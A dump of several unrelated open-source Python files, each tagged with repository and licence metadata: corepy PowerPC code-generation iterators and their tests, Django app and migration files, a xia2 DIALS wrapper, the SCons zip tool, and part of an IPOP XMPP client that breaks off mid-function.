# Determine the block size for each loop
util.load_word(code, r_block_size, self.get_count() - self.get_start())
code.add(ppc.divw(r_block_size, r_block_size, code.r_size))
# Determine the offset for the current block and update the r_count
# (this is primarily for range, which uses different values in r_count
# to initialize ranges that don't start at 0)
code.add(ppc.mullw(r_offset, code.r_rank, r_block_size))
code.add(ppc.add(self.obj.r_count, self.obj.r_count, r_offset))
if self.obj.r_stop is not None:
code.add(ppc.add(self.obj.r_stop, self.obj.r_count, r_block_size))
code.prgm.release_register(r_offset)
code.prgm.release_register(r_block_size)
return
def start(self, align = True, branch = True):
self.obj.start(align = False, branch = branch)
code = self.obj.code
# replace count with rank
if self.obj.mode == CTR:
raise Exception('Parallel CTR loops not supported')
elif self.obj.mode == DEC:
raise Exception('Parallel DEC loops not supported')
elif self.obj.mode == INC:
self._update_inc_count()
if align and branch:
# Align the start of the loop on a 16 byte boundary
while (code.size()) % 4 != 0:
code.add(ppc.noop())
# Update the real iterator's label
self.obj.start_label = code.prgm.get_unique_label("PARALLEL_START")
code.add(self.obj.start_label)
return
def end(self, branch = True):
self.obj.end(branch)
if self.obj.mode == CTR and branch:
raise Exception('Parallel CTR loops not supported')
elif self.obj.mode == DEC:
raise Exception('Parallel DEC loops not supported')
elif self.obj.mode == INC:
self._update_inc_count()
return
def init_address(self):
# Call syn_iters init self.code
self.obj.init_address(self)
# Update the address with the offset
# For variable iterators, this is the value already computed for r_count
self.obj.code.add(ppc.add(self.r_addr, self.r_addr, self.obj.r_count))
return
def __iter__(self):
self.start()
return self
def next(self):
if self.state == 0:
self.state = 1
self.setup()
return self.get_current()
else:
self.cleanup()
self.end()
raise StopIteration
return
class syn_range(syn_iter):
"""
Purpose: Iterate a set number of times and make the current
iteration count available as a variable.
"""
def __init__(self, code, start, stop = None, step = 1):
if stop is None:
stop = start
start = 0
syn_iter.__init__(self, code, stop, step = step, mode = INC)
self.istart = start
return
def get_start(self):
return self.istart
_int_types = ('b', 'h', 'i', 'B', 'H', 'I')
_float_types = ('f','d')
_strides = {'b':1, 'h':2, 'i':4, 'B':1, 'H':2, 'I':4, 'f':4, 'd':8}
_loads = {'b':ppc.lbzx, 'h':ppc.lhax, 'i':ppc.lwzx,
'B':ppc.lbzx, 'H':ppc.lhzx, 'I':ppc.lwzx,
'f':ppc.lfsx, 'd':ppc.lfdx}
_stores = {'b':ppc.stbx, 'h':ppc.sthx, 'i':ppc.stwx,
'B':ppc.stbx, 'H':ppc.sthx, 'I':ppc.stwx,
'f':ppc.stfsx, 'd':ppc.stfdx}
class memory_desc(object):
def __init__(self, typecode, addr = None, size = None):
self.typecode = typecode
self.addr = addr
self.size = size
return
def __len__(self): return self.size
def from_buffer(self, b):
"""
Extract the address and size from a buffer object.
Note: this doesn't very well with buffer objects.
"""
l = repr(b).split(' ')
self.size = int(l[l.index('size') + 1])
self.addr = int(l[l.index('ptr') + 1][:-1], 0)
print l, self.size, self.addr
return
def from_ibuffer(self, m):
"""
Extract the address and size from an object that supports
the buffer interface.
This should be more flexible than the buffer object.
"""
self.addr, self.size = synbuffer.buffer_info(m)
return
_array_ppc_lu = { # array_typecode: ppc_type
'I': vars.Bits,
'I': vars.UnsignedWord,
'i': vars.SignedWord,
'f': vars.SingleFloat,
'd': vars.DoubleFloat
}
class var_iter(syn_iter):
"""
Purpose: Iterate over the values in a scalar array.
"""
# int_type = metavar.int_var
# float_type = metavar.float_var
type_lu = _array_ppc_lu
def __init__(self, code, data, step = 1, length = None, store_only = False, addr_reg = None, save = True):
self.var_type = None
self.reg_type = None
stop = 0
self.data = data
self.addr_reg = addr_reg
self.store_only = store_only
self.save = save
if length is None:
length = len(data)
if type(data) in (_array_type, _extarray_type):
if (data.typecode in self.type_lu.keys()):
self.var_type = self.type_lu[data.typecode]
if data.typecode in ('f', 'd'):
self.reg_type = 'fp'
else:
raise Exception('Unsupported array type: ' + data.typecode)
elif type(data) is _numeric_type:
raise Exception('Unsupported array type: ' + data.typecode)
elif type(data) is memory_desc:
if (data.typecode in self.type_lu.keys()):
self.var_type = self.type_lu[data.typecode]
if data.typecode in ('f', 'd'):
self.reg_type = 'fp'
else:
raise Exception('Unsupported memory type: ' + data.typecode)
else:
raise Exception('Unknown data type:' + str(type(data)))
t = _typecode(data)
step = _strides[t] * step
stop = _strides[t] * length # len(data)
self.typecode = t
syn_iter.__init__(self, code, stop, step, mode = INC)
self.r_current = None
self.r_addr = None
self.current_var = None
return
def get_current(self): return self.current_var
def load_current(self):
return self.code.add(_loads[self.typecode](self.r_current, self.r_addr, self.r_count))
def store_current(self):
return self.code.add(_stores[self.typecode](self.r_current, self.r_addr, self.r_count))
def make_current(self):
return self.var_type(code = self.code, reg = self.r_current)
def init_address(self):
if self.addr_reg is None:
return util.load_word(self.code, self.r_addr, _array_address(self.data))
def start(self, align = True, branch = True):
self.r_current = self.code.prgm.acquire_register(reg_type = self.reg_type)
# addr_reg is the user supplied address for the data
if self.addr_reg is None:
self.r_addr = self.code.prgm.acquire_register()
else:
self.r_addr = self.addr_reg
syn_iter.start(self, align, branch)
self.current_var = self.make_current()
self.init_address()
# print self.r_count, self.r_stop, self.r_current, self.r_addr, self.data.buffer_info()[0]
return
def setup(self):
if not self.store_only:
self.load_current()
syn_iter.setup(self)
return
def cleanup(self):
if self.current_var.assigned and self.save:
self.store_current()
syn_iter.cleanup(self)
return
def end(self, branch = True):
if self.r_current is not None:
self.code.prgm.release_register(self.r_current)
self.r_current = None
if self.r_addr is not None and self.addr_reg is None:
self.code.prgm.release_register(self.r_addr)
self.r_addr = None
syn_iter.end(self, branch)
return
_vector_sizes = {'b':16, 'h':8, 'i':4, 'B':16, 'H':8, 'I':4, 'f':4}
class vector_iter(var_iter):
"""
Purpose: Iterate over the values in a scalar array returning vectors
instead of vars.
"""
type_lu = vmx_vars.array_vmx_lu
def __init__(self, code, data, step = 1, length = None, store_only = False, addr_reg = None):
if type(data) not in (_array_type, _extarray_type, _numeric_type):
raise Exception('Unsupported array type')
if _typecode(data) not in _vector_sizes.keys():
raise Exception('Unsupported array data type for vector operations: ' + data.typecode)
var_iter.__init__(self, code, data,
step = (step * _vector_sizes[_typecode(data)]),
length = length,
store_only = store_only,
addr_reg = addr_reg)
# TODO - AWF - better way to force the reg_type to vector?
#self.reg_type = 'vector'
return
def load_current(self):
return self.code.add(vmx.lvx(self.r_current, self.r_count, self.r_addr))
def store_current(self):
return self.code.add(vmx.stvx(self.r_current, self.r_count, self.r_addr))
class zip_iter(syn_iter):
"""
Purpose: Manage a set of iterators.
"""
def __init__(self, code, *iters):
count = min([i.n_steps() for i in iters])
syn_iter.__init__(self, code, count, mode = INC)
self.iters = iters
return
def start(self, align = True, branch = True):
for i in self.iters: i.start(branch = False)
syn_iter.start(self, align, branch)
return
def setup(self):
for i in self.iters: i.setup()
syn_iter.setup(self)
return
def get_current(self):
return [i.get_current() for i in self.iters]
def cleanup(self):
for i in self.iters: i.cleanup()
syn_iter.cleanup(self)
return
def end(self, branch = True):
syn_iter.end(self, branch)
for i in self.iters: i.end(branch = False)
return
# class unroll_iter(syn_iter):
# """
# Purpose: Repeat an iterator body a set number of times. Optionally
# clone variables and reduce at the end of each iteration.
# """
# pass
# ------------------------------------------------------------
# Tests
# ------------------------------------------------------------
def TestIter():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
a = vars.SignedWord(0, code = code)
for i in syn_iter(code, 16, 4):
a.v = a + 1
for i in syn_iter(code, 16, 4, mode = DEC):
a.v = a + 1
for i in syn_iter(code, 16, 4, mode = INC):
a.v = a + 1
for i in syn_iter(code, 16, 4, mode = INC):
a.v = a + vars.SignedWord.cast(i)
util.return_var(a)
#a.release_register(code)
proc = synppc.Processor()
r = proc.execute(prgm)
# print 'should be 36:', r
assert(r == 36)
return
def TestExternalStop():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
# Data
data = array.array('d', range(5*5))
# Constants - read only
n_rows = vars.SignedWord(5)
n_cols = vars.SignedWord(5)
addr = vars.SignedWord(data.buffer_info()[0])
dbl_size = vars.SignedWord(synppc.WORD_SIZE * 2)
row_bytes = vars.SignedWord(synppc.WORD_SIZE * 5 * 2)
# Variables - read/write
sum = vars.DoubleFloat(0.0)
x = vars.DoubleFloat(0.0)
offset = vars.SignedWord(0)
# Iterators
i_iter = syn_iter(code, 0, mode = INC)
i_iter.set_external_stop(n_rows.reg)
j_ctr = syn_iter(code, 0, mode = CTR)
j_ctr.set_external_stop(n_cols.reg)
for i in i_iter:
offset.v = vars.SignedWord.cast(i) * row_bytes
# Note that j_cnt is unreadable since it's in the ctr register
for j_cnt in j_ctr:
# Load the next vaule in the matrix
ppc.lfdx(x, addr, offset)
sum.v = vars.fmadd(x, x, sum) # sum += x*x
offset.v = offset + dbl_size
# code.add(ppc.Illegal())
util.return_var(sum)
proc = synppc.Processor()
r = proc.execute(prgm, mode = 'fp')
# print 'Test external stop: ', r
assert(r == 4900.0)
return
def TestNestedIter():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = vars.UnsignedWord(0)
for i in syn_iter(code, 5):
for j in syn_iter(code, 5):
for k in syn_iter(code, 5):
a.v = a + i + j + k
util.return_var(a)
#a.release_register()
proc = synppc.Processor()
r = proc.execute(prgm)
# print 'should be 750:', r
assert(r == 750)
return
def TestRange():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = vars.UnsignedWord(0)
for i in syn_range(code, 7):
a.v = a + 1
for i in syn_range(code, 20, 31):
a.v = a + 1
for i in syn_range(code, 20, 26, 2):
a.v = a + 1
util.return_var( a)
#a.release_register(code)
proc = synppc.Processor()
r = proc.execute(prgm)
# print 'should be 21:', r
assert(r == 21)
return
_expected = [10, 11, 12, 13]
def _array_check(result, expected = _expected):
#if result.typecode == 'b':
# for x, y in zip(result, expected):
# print "types", type(x), type(y)
# assert(ord(x) == y)
#else:
for x, y in zip(result, expected):
assert(x == y)
def TestVarIter():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = array.array('I', range(4))
for i in var_iter(code, a):
i.v = i + 10
ai = array.array('i', range(4))
for i in var_iter(code, ai):
i.v = i + 10
# b = array.array('H', range(4))
# for i in var_iter(code, b):
# i.v = i + 10
# bi = array.array('h', range(4))
# for i in var_iter(code, bi):
# i.v = i + 10
# c = array.array('B', range(4))
# for i in var_iter(code, c):
# i.v = i + 10
# ci = array.array('b', range(4))
# for i in var_iter(code, ci):
# i.v = i + 10
f = array.array('f', range(4))
f10 = vars.SingleFloat(10.0)
for i in var_iter(code, f):
i.v = i + f10
d = array.array('d', range(4))
d10 = vars.DoubleFloat(10.0)
for i in var_iter(code, d):
i.v = i + d10
proc = synppc.Processor()
r = proc.execute(prgm)
_array_check(a)
_array_check(ai)
# print b
# print bi
# print c
# print ci
_array_check(f)
_array_check(d)
# print 'TODO: Implememnt the rest of the integer types (or have a clean way of upcasting to signed/unsigned int)'
return
def TestMemoryDesc():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = array.array('I', range(4))
m = memory_desc('I', a.buffer_info()[0], 4)
for i in var_iter(code, m):
i.v = i + 10
proc = synppc.Processor()
r = proc.execute(prgm)
_array_check(a)
return
# def TestMemoryMap():
# """
# Use mmap to map a file and a memory_desc to iterate over the contents.
# """
# import mmap
# import os
# filename = 'metaiter.TestMemoryMap.dat'
# # Create a file
# fw = open(filename, 'w')
# fw.write('-' * 64)
# fw.close()
# # Open the file again for memory mapping
# f = open(filename, 'r+')
# size = os.path.getsize(filename)
# m = mmap.mmap(f.fileno(), size)
# # Create a descriptor
# md = memory_desc('I')
# md.from_ibuffer(m)
# # Adjust the addr/size to iterate over the middle of the file
# md.addr += 16
# md.size = 8
# code = synppc.InstructionStream()
# # 32-bit word for the string 'XXXX'
# X = metavar.var(code, 0x58585858)
# # Replace the values in the file with X's
# for i in var_iter(code, md):
# i.v = X
# proc = synppc.Processor()
# r = proc.execute(code)
# return
def TestVecIter():
prgm = synppc.Program()
code = prgm.get_stream()
prgm.add(code)
ppc.set_active_code(code)
a = extarray.extarray('I', range(16))
for i in vector_iter(code, a):
i.v = vmx.vadduws.ex(i, i)
ai = extarray.extarray('i', range(16))
for i in vector_iter(code, ai):
i.v = vmx.vaddsws.ex(i, i)
b = extarray.extarray('H', range(16))
for i in vector_iter(code, b):
i.v = vmx.vadduhs.ex(i, i)
bi = extarray.extarray('h', range(16))
for i in vector_iter(code, bi):
i.v = vmx.vaddshs.ex(i, i)
c = extarray.extarray('B', range(16))
for i in vector_iter(code, c):
i.v = vmx.vaddubs.ex(i, i)
ci = extarray.extarray('b', range(16))
for i in vector_iter(code, ci):
i.v = vmx.vaddsbs.ex(i, i)
ften = vmx_vars.BitType(10.0)
f = extarray.extarray('f', range(16))
for i in vector_iter(code, f):
i.v = vmx.vaddfp.ex(i, i)
proc = synppc.Processor()
r = proc.execute(prgm)
expected = [0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30]
_array_check(a, expected)
_array_check(ai, expected)
_array_check(b, expected)
_array_check(bi, expected)
_array_check(c, expected)
_array_check(ci, expected)
_array_check(f, expected)
return
def TestZipIter():
prgm = synppc.Program()
code = prgm.get_stream()
ppc.set_active_code(code)
prgm.add(code)
a = extarray.extarray('I', range(16, 32))
b = extarray.extarray('I', range(32, 48))
c = extarray.extarray('I', [0 for i in range(16)])
sum = vars.UnsignedWord(0)
for i, j, k in zip_iter(code, var_iter(code, a), var_iter(code, b),
var_iter(code, c, store_only = True)):
k.v = i + j
sum.v = sum + 1
av = vector_iter(code, extarray.extarray('I', range(16)))
bv = vector_iter(code, extarray.extarray('I', range(16, 32)))
cv = vector_iter(code, extarray.extarray('I', [0 for i in range(16)]), store_only = True)
for i, j, k in zip_iter(code, av, bv, cv):
k.v = vmx.vadduws.ex(i, j) # i + j
util.return_var(sum)
proc = synppc.Processor()
r = proc.execute(prgm, mode = 'int')
assert(r == 16)
print a
print b
print c
print av.data
print bv.data
print cv.data
print 'TODO: Finish checking TestZipIter values'
return
# def TestParallelIter():
# code = ParallelInstructionStream()
# proc = synppc.Processor()
# result = array.array('I', [42,42,42,13,13,13])
# data = array.array('I', range(16))
# # code.add(ppc.Illegal())
# a = metavar.var(code, 0)
# rank = metavar.int_var(code, reg = code.r_rank)
# # for i, j in parallel(zip_iter(code, syn_iter(code, 16), syn_range(code, 16, 32))):
# # a.v = i
# # for i in parallel(syn_range(code, 16, 32)):
# # a.v = i
# for i in parallel(vector_iter(code, data)):
# i.v = i + 1
# metavar.syn_return(code, a)
# t1 = proc.execute(code, mode='async', params=(0,2,0))
# t2 = proc.execute(code, mode='async', params=(1,2,0))
# proc.join(t1)
# proc.join(t2)
# print data
# return
if __name__=='__main__':
# TestMemoryMap()
util.RunTest(TestIter)
util.RunTest(TestExternalStop)
util.RunTest(TestNestedIter)
util.RunTest(TestRange)
util.RunTest(TestVarIter)
util.RunTest(TestMemoryDesc)
util.RunTest(TestVecIter)
util.RunTest(TestZipIter)
# TestParallelIter()
|
matthiaskramm/corepy
|
corepy/arch/ppc/lib/iterators.py
|
Python
|
bsd-3-clause
| 27,693
|
from django.apps import AppConfig
class UserPanelConfig(AppConfig):
name = 'djdt_user_panel'
|
rosco77/djdt_user_panel
|
djdt_user_panel/apps.py
|
Python
|
bsd-3-clause
| 99
|
from __future__ import annotations
import os
from xia2.Driver.DriverFactory import DriverFactory
def ImportXDS(DriverType=None):
"""A factory for ImportXDSWrapper classes."""
DriverInstance = DriverFactory.Driver(DriverType)
class ImportXDSWrapper(DriverInstance.__class__):
def __init__(self):
super().__init__()
self.set_executable("dials.import_xds")
self._spot_xds = None
self._integrate_hkl = None
self._xparm_xds = None
self._experiments_json = None
self._reflection_filename = None
def set_spot_xds(self, spot_xds):
self._spot_xds = spot_xds
def set_integrate_hkl(self, integrate_hkl):
self._integrate_hkl = integrate_hkl
def set_xparm_xds(self, xparm_xds):
self._xparm_xds = xparm_xds
def set_experiments_json(self, experiments_json):
self._experiments_json = experiments_json
def get_reflection_filename(self):
return self._reflection_filename
def get_experiments_json(self):
return self._experiments_json
def run(self):
self.clear_command_line()
if self._spot_xds is not None:
self._reflection_filename = os.path.join(
self.get_working_directory(), "%s_spot_xds.refl" % self.get_xpid()
)
self.add_command_line(self._spot_xds)
self.add_command_line("output.filename=%s" % self._reflection_filename)
self.add_command_line("method=reflections")
elif self._integrate_hkl is not None:
self._reflection_filename = os.path.join(
self.get_working_directory(),
"%s_integrate_hkl.refl" % self.get_xpid(),
)
assert self._experiments_json is not None
self.add_command_line(self._integrate_hkl)
self.add_command_line(self._experiments_json)
self.add_command_line("output.filename=%s" % self._reflection_filename)
self.add_command_line("method=reflections")
elif self._xparm_xds is not None:
if self._experiments_json is None:
self._experiments_json = os.path.join(
self.get_working_directory(),
"%s_xparm_xds.expt" % self.get_xpid(),
)
directory, xparm = os.path.split(self._xparm_xds)
self.add_command_line(directory)
self.add_command_line("xds_file=%s" % xparm)
self.add_command_line("output.filename=%s" % self._experiments_json)
self.start()
self.close_wait()
self.check_for_errors()
if self._reflection_filename is not None:
assert os.path.exists(
self._reflection_filename
), self._reflection_filename
else:
assert os.path.exists(self._experiments_json), self._experiments_json
return ImportXDSWrapper()
|
xia2/xia2
|
src/xia2/Wrappers/Dials/ImportXDS.py
|
Python
|
bsd-3-clause
| 3,161
|
"""SCons.Tool.zip
Tool-specific initialization for zip.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os.path
import SCons.Builder
import SCons.Defaults
import SCons.Node.FS
import SCons.Util
try:
import zipfile
internal_zip = 1
except ImportError:
internal_zip = 0
if internal_zip:
zipcompression = zipfile.ZIP_DEFLATED
def zip(target, source, env):
def visit(arg, dirname, names):
for name in names:
path = os.path.join(dirname, name)
if os.path.isfile(path):
arg.write(path)
compression = env.get('ZIPCOMPRESSION', 0)
zf = zipfile.ZipFile(str(target[0]), 'w', compression)
for s in source:
if s.isdir():
os.path.walk(str(s), visit, zf)
else:
zf.write(str(s))
zf.close()
else:
zipcompression = 0
zip = "$ZIP $ZIPFLAGS ${TARGET.abspath} $SOURCES"
zipAction = SCons.Action.Action(zip, varlist=['ZIPCOMPRESSION'])
ZipBuilder = SCons.Builder.Builder(action = SCons.Action.Action('$ZIPCOM', '$ZIPCOMSTR'),
source_factory = SCons.Node.FS.Entry,
source_scanner = SCons.Defaults.DirScanner,
suffix = '$ZIPSUFFIX',
multi = 1)
def generate(env):
"""Add Builders and construction variables for zip to an Environment."""
try:
bld = env['BUILDERS']['Zip']
except KeyError:
bld = ZipBuilder
env['BUILDERS']['Zip'] = bld
env['ZIP'] = 'zip'
env['ZIPFLAGS'] = SCons.Util.CLVar('')
env['ZIPCOM'] = zipAction
env['ZIPCOMPRESSION'] = zipcompression
env['ZIPSUFFIX'] = '.zip'
def exists(env):
return internal_zip or env.Detect('zip')
|
datalogics/scons
|
src/engine/SCons/Tool/zip.py
|
Python
|
mit
| 3,093
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-31 10:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='TestModel1',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('symbol', models.CharField(blank=True, max_length=1, null=True)),
],
),
migrations.CreateModel(
name='TestModel2',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('other_model', models.ManyToManyField(to='core.TestModel1')),
],
),
]
|
dahfool/navigator
|
core/migrations/0001_initial.py
|
Python
|
mit
| 1,001
|
#!/usr/bin/env python
import sys
import json
import time
from controller.framework.ControllerModule import ControllerModule
import controller.framework.fxlib as fxlib
import sleekxmpp
from collections import defaultdict
from sleekxmpp.xmlstream.stanzabase import ElementBase, ET, JID
from sleekxmpp.xmlstream import register_stanza_plugin
from sleekxmpp.xmlstream.handler.callback import Callback
from sleekxmpp.xmlstream.matcher import StanzaPath
from sleekxmpp.stanza.message import Message
from sleekxmpp.plugins.base import base_plugin
py_ver = sys.version_info[0]
if py_ver == 3:
import _thread as thread
else:
import thread
#set up a new custom message stanza
class Ipop_Msg(ElementBase):
namespace = 'Conn_setup'
name = 'Ipop'
plugin_attrib = 'Ipop'
interfaces = set(('setup','payload','uid'))
subinterfaces = interfaces
class XmppClient(ControllerModule,sleekxmpp.ClientXMPP):
def __init__(self,CFxHandle,paramDict,ModuleName):
ControllerModule.__init__(self,CFxHandle,paramDict,ModuleName)
# keeps track of last recvd advertisement and if node is active on XMPP.
self.xmpp_peers = defaultdict(lambda:[0,False])
# need to maintain uid<->jid mapping to route xmpp messages.
self.uid_jid = {}
# FullJID,Knows my UID,num(Correct advts recvd)
self.jid_uid = defaultdict(lambda:['',False,1])
self.xmpp_username = self.CMConfig.get("xmpp_username")
self.xmpp_passwd = self.CMConfig.get("xmpp_password")
self.xmpp_host = self.CMConfig.get("xmpp_host")
self.xmpp_port = self.CMConfig.get("xmpp_port")
self.vpn_type = self.CFxHandle.queryParam("vpn_type")
self.uid = ""
# time of last recvd xmpp advt.
self.last_sent_advt = 0
# keeps track of if xmpp advt recvd in interval
self.xmpp_advt_recvd = True
# Initial ADVT Delay
self.INITIAL_ADVT_DELAY =5
# interval between sending advertisements
self.advt_delay = self.INITIAL_ADVT_DELAY
# Maximum delay between advertisements is 10 minutes
self.MAX_ADVT_DELAY = 600
# initialize the base Xmpp client class, handle login/authentication.
if self.CMConfig.get("xmpp_authentication_method")=="x509" and \
(self.CMConfig.get("xmpp_username")!= None \
or self.CMConfig.get("xmpp_password")!= None):
raise RuntimeError("x509 Authentication Exception. Username or Password present in IPOP configuration file.")
use_tls = True
if self.CMConfig.get("xmpp_authentication_method")=="x509":
sleekxmpp.ClientXMPP.__init__(self,self.xmpp_host,self.xmpp_passwd,sasl_mech='EXTERNAL')
self.ssl_version = ssl.PROTOCOL_TLSv1
self.ca_certs = self.CMConfig.get("truststore")
self.certfile = self.CMConfig.get("certdirectory")+self.CMConfig.get("certfile")
self.keyfile = self.CMConfig.get("certdirectory")+self.CMConfig.get("keyfile")
else:
sleekxmpp.ClientXMPP.__init__(self, self.xmpp_username, self.xmpp_passwd, sasl_mech='PLAIN')
if self.CMConfig.get("xmpp_accept_untrusted_server")==True:
self['feature_mechanisms'].unencrypted_plain = True
use_tls = False
else:
self.ca_certs = self.CMConfig.get("truststore")
# register a new plugin stanza and handler for it,
# whenever a matching message will be received on
# the xmpp stream , registered handler will be called.
register_stanza_plugin(Message, Ipop_Msg)
self.registerHandler(
Callback('Ipop',
StanzaPath('message/Ipop'),
self.MsgListener))
# Register event handler for session start
self.add_event_handler("session_start",self.start)
# calculate UID, for the meantime
# address mapping
self.uid_ip4_table = {}
self.ip4_uid_table = {}
# populate uid_ip4_table and ip4_uid_table with all UID and IPv4
# mappings within the /16 subnet
if (self.vpn_type == "GroupVPN"):
parts = self.CFxHandle.queryParam("ip4").split(".")
ip_prefix = parts[0] + "." + parts[1] + "."
for i in range(0, 255):
for j in range(0, 255):
ip4 = ip_prefix + str(i) + "." + str(j)
uid = fxlib.gen_uid(ip4)
self.uid_ip4_table[uid] = ip4
self.ip4_uid_table[ip4] = uid
self.uid = self.ip4_uid_table[self.CFxHandle.queryParam("ip4")]
elif (self.vpn_type == "SocialVPN"):
self.registerCBT('Watchdog', 'QUERY_IPOP_STATE')
# Start xmpp handling thread
self.xmpp_handler()
# Triggered at start of XMPP session
def start(self,event):
self.get_roster()
self.send_presence()
# Add handler for incoming presence messages.
self.add_event_handler("presence_available",self.handle_presence)
# will need to handle presence, to keep track of who is online.
def handle_presence(self,presence):
presence_sender = presence['from']
if (self.xmpp_peers[presence_sender][1]==False):
self.xmpp_peers[presence_sender]=[time.time(),True]
self.log("presence received from {0}".format(presence_sender))
# This handler method listens for the matched messages on tehj xmpp stream,
# extracts the setup and payload and takes suitable action depending on the
# them.
def MsgListener(self,msg):
if (self.uid == ""):
self.log("UID not yet received- Not Ready.")
return
# extract setup and content
setup = str(msg['Ipop']['setup'])
payload = str(msg['Ipop']['payload'])
msg_type,target_uid,target_jid = setup.split("#")
sender_jid = msg['from']
if (msg_type == "regular_msg"):
self.log("Recvd mesage from {0}".format(msg['from']))
self.log("Msg is {0}".format(payload))
elif (msg_type == "xmpp_advertisement"):
# peer_uid - uid of the node that sent the advt
# target_uid - what it percieves as my uid
try:
peer_uid,target_uid = payload.split("#")
if (peer_uid != self.uid):
# update last known advt reception time in xmpp_peers
self.xmpp_peers[sender_jid][0] = time.time()
self.uid_jid[peer_uid] = sender_jid
self.jid_uid[msg['from']][0] = peer_uid
# sender knows my uid, so I will not send an advert to him
if (target_uid == self.uid):
self.jid_uid[msg['from']][1] = True
# recvd correct advertisement
self.jid_uid[msg['from']][2]+=1
else:
self.jid_uid[msg['from']][1] = False
msg = {}
msg["uid"] = peer_uid
msg["data"] = peer_uid
msg["type"] = "xmpp_advertisement"
if (self.vpn_type == "GroupVPN"):
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
elif (self.vpn_type == "SocialVPN"):
self.registerCBT('Watchdog','XMPP_MSG',msg)
# refresh xmpp advt recvd flag
self.xmpp_advt_recvd = True
self.log("recvd xmpp_advt from {0}".format(msg["uid"]))
except:
self.log("advt_payload: {0}".format(payload))
# compare uid's here , if target uid does not match with mine do nothing.
# have to avoid loop messages.
if (target_uid == self.uid):
sender_uid,recvd_data = payload.split("#")
# If I recvd XMPP msg from this peer, I should record his UID-JID & JID-UID
self.uid_jid[sender_uid] = sender_jid
if (msg_type == "con_req"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "con_req"
# send this CBT to BaseTopology Manager
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd con_req from {0}".format(msg["uid"]))
elif (msg_type == "con_resp"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "peer_con_resp"
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd con_resp from {0}".format(msg["uid"]))
elif (msg_type == "con_ack"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "con_ack"
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd con_ack from {0}".format(msg["uid"]))
elif (msg_type == "ping_resp"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "ping_resp"
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd ping_resp from {0}".format(msg["uid"]))
elif (msg_type == "ping"):
msg = {}
msg["uid"] = sender_uid
msg["data"] = recvd_data
msg["type"] = "ping"
self.registerCBT('BaseTopologyManager','XMPP_MSG',msg)
self.log("recvd ping from {0}".format(msg["uid"]))
def sendMsg(self,peer_jid,setup_load=None,msg_payload=None):
if (setup_load == None):
setup_load = "regular_msg" + "#" + "None" + "#" + peer_jid.full
else:
setup_load = setup_load + "#" + peer_jid.full
if py_ver != 3:
setup_load = unicode(setup_load)
if (msg_payload==None):
content_load = "Hello there this is {0}".format(self.xmpp_username)
else:
content_load = msg_payload
msg = self.Message()
msg['to'] = peer_jid.bare
msg['type'] = 'chat'
msg['Ipop']['setup'] = setup_load
msg['Ipop']['payload'] = content_load
msg.send()
self.log("Sent a message to {0}".format(peer_jid))
def xmpp_handler(self):
try:
if (self.connect(address = (self.xmpp_host,self.xmpp_port))):
thread.start_new_thread(self.process,())
self.log("Started XMPP handling")
except:
self.log("Unable to start XMPP handling thread-Check Internet connectivity/credentials.",severity='error')
def log(self,msg,severity='info'):
self.registerCBT('Logger',severity,msg)
def initialize(self):
self.log("{0} module Loaded".format(self.ModuleName))
def processCBT(self, cbt):
if (cbt.action == 'QUERY_IPOP_STATE_RESP'):
if cbt.data != None:
self.uid = cbt.data["_uid"]
self.log("UID {0} received from Watchdog".format(self.uid))
if (cbt.action == "DO_SEND_MSG"):
if (self.uid == ""):
self.log("UID not yet received- Not Ready.")
return
method = cbt.data.get("method")
peer_uid = cbt.data.get("uid")
try:
peer_jid = self.uid_jid[peer_uid]
except:
log_msg = "UID-JID mapping for UID: {0} not present.\
msg: {1} will not be sent.".format(peer_uid,method)
self.log(log_msg)
return
data = cbt.data.get("data")
if (method == "con_req"):
setup_load = "con_req"+"#"+peer_uid
msg_payload = self.uid+"#"+data
